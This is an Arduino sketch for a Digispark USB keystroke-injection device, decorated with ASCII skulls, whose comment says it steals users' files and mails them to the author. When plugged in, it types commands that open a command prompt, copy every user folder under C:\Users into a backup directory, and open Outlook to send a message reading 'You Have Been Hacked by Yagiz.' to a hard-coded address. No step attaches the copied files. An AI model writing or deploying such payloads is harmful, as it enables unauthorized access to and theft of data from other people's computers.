#include "DigiKeyboard.h"

/*
This code steals backup files from the all users that the device has, then sends as a mail to your static mail address.
  ___________________________________

                       ______
                    .-"      "-.
                   /            \
       _          |              |          _
      ( \         |,  .-.  .-.  ,|         / )
       > "=._     | )(__/  \__)( |     _.=" < 
      (_/"=._"=._ |/     /\     \| _.="_.="\_)
             "=._ (_     ^^     _)"_.="
                 "=\__|IIIIII|__/="
                _.="| \IIIIII/ |"=._
      _     _.="_.="\          /"=._"=._     _
     ( \_.="_.="     `--------`     "=._"=._/ )
      > _.="                            "=._ <
      (_/yagizaladag                        \_)
*/

void setup() {
    DigiKeyboard.delay(500); 
    DigiKeyboard.sendKeyStroke(0); 
    DigiKeyboard.delay(500);

    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 
    DigiKeyboard.delay(500);

    DigiKeyboard.print("cmd");
    DigiKeyboard.sendKeyStroke(KEY_CTRL_LEFT, MOD_SHIFT_LEFT); 
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(1000); 

    DigiKeyboard.print("xcopy C:\\Users\\* C:\\Backup\\ /E /H /K /Y");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(5000); 

    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 
    DigiKeyboard.delay(500);
    
    DigiKeyboard.print("outlook");
    DigiKeyboard.sendKeyStroke(KEY_ENTER); 
    DigiKeyboard.delay(3000); 
    
    DigiKeyboard.sendKeyStroke(KEY_N, MOD_CONTROL_LEFT); 
    DigiKeyboard.delay(1000); 
    
    DigiKeyboard.print("yagiz_aladag@hotmail.com");
    DigiKeyboard.sendKeyStroke(KEY_TAB); 
    DigiKeyboard.delay(500);

    DigiKeyboard.print("BackupFiles");
    DigiKeyboard.sendKeyStroke(KEY_TAB); 
    DigiKeyboard.delay(500);

    DigiKeyboard.print("You Have Been Hacked by Yagiz.");
    DigiKeyboard.sendKeyStroke(KEY_TAB); 
    DigiKeyboard.delay(500);

    DigiKeyboard.sendKeyStroke(KEY_ENTER); 
}

void loop() {
}


/*

                           __________
                         ~#########%%;~.
                      /##############%%;`\
                     |#####/~YAGIZ~\%%;;,;|
                     |######\    ;;;;;;.,.|
                     |###########%;;;;;.,.|
        XX           |##/~~\####%;;;/~~\;,|       XX
      XX..X          |#|  o  \##%;/  o  |.|      X..XX
    XX.....X         |##\____/##%;\____/.,|     X.....XX
   XXXXX.....XX      \#########/\;;;;;;,, /      XX.....XXXXX
  X |......XX%,.@      \######/%;\;;;;, /      @#%,XX......| X
  X |.....X  @#%,.@     |######%%;;;;,.|     @#%,.@  X.....| X
  X  \...X     @#%,.@   |# # # % ; ; ;,|   @#%,.@     X.../  X
   X# \.X        @#%,.@                  @#%,.@        X./  #
    ##  X          @#%,.@              @#%,.@          X   #
 , "# #X            @#%,.@          @#%,.@            X ##
   `###X             @#%,.@      @#%,.@             ####'
  . ' ###              @#%.,@  @#%,.@              ###`"
    . ";"                @#%.@#%,.@                ;"` ' .
      '                    @#%,.@                   ,.
      ` ,                @#%,.@  @@                `
                          @@@  @@@                  .



*/
